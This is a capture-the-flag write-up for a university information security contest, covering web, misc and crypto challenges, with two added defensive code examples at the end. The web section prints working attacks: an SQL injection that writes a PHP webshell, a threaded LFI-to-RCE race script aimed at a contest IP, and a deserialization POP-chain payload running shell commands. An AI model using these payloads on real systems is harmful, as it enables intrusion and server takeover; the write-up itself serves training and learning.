Title: Hebei Normal University Information Security Challenge - Preliminary Writeup

WEB

mmmmd5d5d5d5

Opening the link shows this page:

image

Bypass

?a[]=1&b[]=2

image

Construct md5

    <?php
    // Search for an integer whose md5 has '3ddc6' at offset 5.
    for ($i = 0; $i <= 100000; $i++) {
        if (substr(md5($i), 5, 5) === '3ddc6') {
            echo $i;
            break;
        }
    }
    ?>

Enter the next level

image

submit

ffiffdyop

get:

    <?php
    error_reporting(0);
    include 'flag.php';
    highlight_file(__FILE__);
    // Both parameters must differ while their md5() results are identical.
    if ($_POST['param1'] !== $_POST['param2'] && md5($_POST['param1']) === md5($_POST['param2'])) {
        echo $flag;
    }

image

Construct the payload:

param1[]=1&param2[]=2

You can get flag

EDGnb(Sign-in)

Open directly docker desktop version

image

You can get flag

The treasure of the time tower

The link opens a login box

image

Construct the payload:

pswd=admin&usname=admin' union select 1,'<?php eval($_POST[1]);' into outfile '/var/www/html/1203.php';#

image

Connect to 1203.php with AntSword, using 1 as the password, to get the flag

image

LFI_to_RCE

    <?php
    show_source('./index.php');
    include $_GET['file'];
    ?>

Warning: include(): Filename cannot be empty in /var/www/html/index.php on line 3

Warning: include(): Failed opening '' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 3

The exp:

    import io
    import threading

    import requests

    url = 'http://81.70.102.209:10040/index.php'
    sessid = '21r000'


    def write(session):
        # Keep uploading so PHP stores the upload-progress field in the session file.
        filebytes = io.BytesIO(b'a' * 1024 * 50)
        while True:
            res = session.post(url,
                data={
                    'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);'
                },
                cookies={
                    'PHPSESSID': sessid
                },
                files={
                    'file': ('21r000.jpg', filebytes)
                }
            )


    def read(session):
        # Keep including the session file through the ?file= parameter.
        while True:
            res = session.post(url + '?file=/tmp/sess_' + sessid,
                data={
                    '1': 'system("ls /");'
                },
                cookies={
                    'PHPSESSID': sessid
                }
            )
            if 'etc' in res.text:
                print(res.text)


    if __name__ == '__main__':
        event = threading.Event()
        with requests.session() as session:
            for i in range(5):
                threading.Thread(target=write, args=(session,)).start()
            for i in range(5):
                threading.Thread(target=read, args=(session,)).start()
        event.set()

image

Visit to get flag

unserialize

    <?php
    error_reporting(0);
    include 'hint.php';

    class x {
        public $value;
        public $cc;
        function __wakeup() {
            die('fighting!');
        }
    }

    class a {
        public $nice;
        public function __destruct()
        {
            $this->nice = unserialize($this->nice);
            $this->nice->value = $fake;
            if ($this->nice->value === $this->nice->cc)
                $this->test->good();
        }
    }

    class b {
        public $value;
        public $array;
        public function good() {
            if (is_array($this->array)) {
                ($this->array)($this->value);
            }
            else {
                echo 'must_array';
            }
        }
    }

    class c {
        public $value;
        public function shell($func) {
            if (preg_match('/^[a-z0-9]*$/isD', $func)) {
                die('y0u_A2e_HacKK!');
            }
            else {
                $func($this->value);
            }
        }
    }

    if (isset($_GET['pop'])) {
        $pop = base64_decode($_GET['pop']);
        unserialize($pop);
    } else {
        highlight_file(__FILE__);
    }

This is a POP chain challenge; change a:2 to a:3 in the serialized string

?pop=TzoxOiJhIjozOntzOjQ6Im5pY2UiO3M6Mzc6Ik86MToieCI6Mjp7czo1OiJ2YWx1ZSI7TjtzOjI6ImNjIjtOO30iO3M6NDoidGVzdCI7TzoxOiJiIjoyOntzOjU6InZhbHVlIjtzOjc6IlxzeXN0ZW0iO3M6NToiYXJyYXkiO2E6Mjp7aTowO086MToiYyI6MTp7czo1OiJ2YWx1ZSI7czo5OiJjYXQgL2ZsYWciO31pOjE7czo1OiJzaGVsbCI7fX19

Script used to build the payload:

    <?php
    class x {
        public $value;
        public $cc;
        public function __construct()
        {
            $this->value = $fake;
            $this->cc = $fake;
        }
        function __wakeup() {
            die('fighting!');
        }
    }

    class a {
        public $nice;
        public function __construct()
        {
            $this->nice = serialize(new x());
            $this->test = new b();
        }
        public function __destruct()
        {
            $this->nice = unserialize($this->nice);
            $this->nice->value = $fake;
            if ($this->nice->value === $this->nice->cc)
                $this->test->good();
        }
    }

    class b {
        public $value = '\system';
        public $array;
        public function __construct()
        {
            $this->array = [new c(), 'shell'];
        }
        public function good() {
            if (is_array($this->array)) {
                ($this->array)($this->value);
            }
            else {
                echo 'must_array';
            }
        }
    }

    class c {
        public $value = 'cat /flag';
        public function shell($func) {
            if (preg_match('/^[a-z0-9]*$/isD', $func)) {
                die('y0u_A2e_HacKK!');
            }
            else {
                $func($this->value);
            }
        }
    }

    $a = new a();
    echo serialize($a);
    echo '<br>';
    echo base64_encode(serialize($a));
    ?>

misc

Come to the official account ya

image

Just scan the code

JamesHarden

Download and decompress the attachment and modify the file suffix. After adding .zip, the decompressed file is a .class file:

image

Rot13 decryption of URPGS{Jr1p0zr_G0_U3pg6_!} to obtain flag:

image

Hide and seek

The attachment opens as a Word document

image

According to the text prompt, change the font size of the composition content to 12

The content turns out to be JSFuck-encoded

image

Decode it with the online tool at http://codetab.com/JsUnFuck

This yields the flag

image

Lost Dog

Attachment opens

image

Open the lost dog folder

image

There is an image in the compressed package, but a password is required

Use the brute-force mode in Ziperello, with the character set limited to digits

image

image

The password is 142345, and the file is successfully decompressed to get a picture

image

Analyze the file content using binwalk in Kali

image

I found that there is a jpg file hidden in the hidden picture

Use foremost to extract the files

image

The second image shows flag

image

snake

I got a tip when I reached 6000 points

image

Trace the source code

image

Remodel the show_text function

image

image

Unpacking the PyInstaller executable yields snake.pyc; decompiling that .pyc back to .py gives the source code.

image

image

Get flag:

image

Questions

Just sign and return, and continue next time.

crypto

Sign in

Attachment opens

image

Decoding the "Buddhist Zen Treatise on Zen" cipher text yields a base64 string:

SkJDVUdWQ0dQTlRXNjMzRUw1V0hLWTNMTDVURzY0UzdQRlhYSzdJPQ==

After base64-decoding it, base32-decode the result to get the flag:

image

RSA_e_n

Attachment:

image

Given e, n and c for RSA, go straight to the script:

    import gmpy2
    import RSAwienerHacker

    e = 0x14b367bf01efd4dc667b8e62975479c612c96e78f7f1f55242b2973c882ddcb33a65c52174d8ae1273764ce429054ea3f2fdc38ff205443c92ef4198739f05aa11fc10d3fc6ff30c8f5f05a04f43e3d8fc9bfffe916b2e0360560a162729e91b7775bda70177e0f875626e0a81bd4eacea9948b02232a82659f8d9aa9b4c754f
    n = 0x75be564267f8bf6c2038dd0cadfeecbc3158acfc27e679dd0bdb0db0e90bd5198a0a7edc0626f357a2d75f3c37ede045b7f7ca6bda79e5bf6fc0aea0aa7beda587388599d2b77b538fc3e6666784493ffaf731e2ae232e8e9e9f9f2a4df25c19b7680f5bf6c485bd87923f01c17d8ec35438772c28e361774e6e7681d67ecbe19
    c = 1012765995653341910858965697656721116652720518377308814754312270523080954855033627158404996938070951204
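The RSA_e_n script above relies on the RSAwienerHacker module: an e almost as large as n points to a small private exponent d, which the continued-fraction expansion of e/n gives away. As an added example (not part of the original post), the same check written out as a key audit, using a constructed toy modulus and hypothetical function names rather than the challenge values:

```python
from math import isqrt

def convergents(num, den):
    """Yield the continued-fraction convergents (k, d) of num/den."""
    h0, h1, k0, k1 = 0, 1, 1, 0
    while den:
        q = num // den
        num, den = den, num - q * den
        h0, h1 = h1, q * h1 + h0
        k0, k1 = k1, q * k1 + k0
        yield h1, k1

def wiener_private_exponent(e, n):
    """Return d if the public key alone reveals it (small d), else None."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k      # candidate phi(n)
        s = n - phi + 1             # equals p + q if the candidate is right
        disc = s * s - 4 * n        # equals (p - q)^2 if the candidate is right
        if s > 0 and disc >= 0:
            r = isqrt(disc)
            if r * r == disc and (s + r) % 2 == 0:
                return d
    return None

def audit(e, n):
    """Report whether a public key fails the small-d check."""
    d = wiener_private_exponent(e, n)
    return "WEAK: private exponent recoverable" if d else "passes this check"

# Constructed toy keys sharing n = 239 * 379 (far too small for real use).
N = 90581
WEAK_E = 17993      # private exponent 5, below n**0.25 / 3
USUAL_E = 65537     # private exponent 26801

if __name__ == "__main__":
    print(audit(WEAK_E, N))
    print(audit(USUAL_E, N))
```

Keys generated by picking a random prime-sized d, or by fixing e = 65537, do not fall to this check; keys built by choosing a deliberately short d do.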
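For the unserialize challenge above, where the payload changes a:2 to a:3: an added example (not part of the original post) of an inspection step that parses PHP's serialize format, including serialized objects nested inside string values as in $nice, and reports objects whose declared member count differs from the members actually present. The function names and sample strings are constructed for illustration.

```python
import re

def _parse(buf, pos, found):
    """Parse one serialized value starting at buf[pos]; return the end position."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                   # N;
        return pos + 2
    if tag in (b"b", b"i", b"d", b"r", b"R"):         # i:42;
        return buf.index(b";", pos) + 1
    if tag == b"s":                                   # s:LEN:"bytes";
        colon = buf.index(b":", pos + 2)
        start = colon + 2
        end = start + int(buf[pos + 2:colon])
        if re.match(rb"[Oa]:\d+:", buf[start:end]):   # serialized data inside a string
            try:
                _parse(buf[start:end], 0, found)
            except ValueError:
                pass                                  # it only looked like one
        return end + 2
    if tag in (b"a", b"O"):                           # a:N:{...}  O:LEN:"Cls":N:{...}
        name, cpos = None, pos + 2
        if tag == b"O":
            colon = buf.index(b":", pos + 2)
            nlen = int(buf[pos + 2:colon])
            name = buf[colon + 2:colon + 2 + nlen].decode()
            cpos = colon + nlen + 4
        brace = buf.index(b":{", cpos)
        declared, pos, actual = int(buf[cpos:brace]), brace + 2, 0
        while buf[pos:pos + 1] != b"}":               # count key/value pairs to the brace
            pos = _parse(buf, _parse(buf, pos, found), found)
            actual += 1
        if name is not None:
            found.append((name, declared, actual))
        return pos + 1
    raise ValueError("unsupported or truncated data at offset %d" % pos)

def count_mismatches(payload):
    """Return (class, declared, actual) for objects whose member count was altered."""
    found = []
    _parse(payload, 0, found)
    return [f for f in found if f[1] != f[2]]

# Constructed, harmless samples (not the challenge payload).
INNER = b'O:1:"x":1:{s:2:"cc";N;}'
SAMPLE_OK = b'O:1:"a":2:{s:4:"nice";s:%d:"%s";s:4:"test";N;}' % (len(INNER), INNER)
SAMPLE_EDITED = SAMPLE_OK.replace(b'"a":2:', b'"a":3:')

if __name__ == "__main__":
    print(count_mismatches(SAMPLE_OK))
    print(count_mismatches(SAMPLE_EDITED))
```

A mismatch is a useful tripwire when inspecting requests; the underlying fix is to keep request data away from unserialize(), or to call it with ['allowed_classes' => false].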
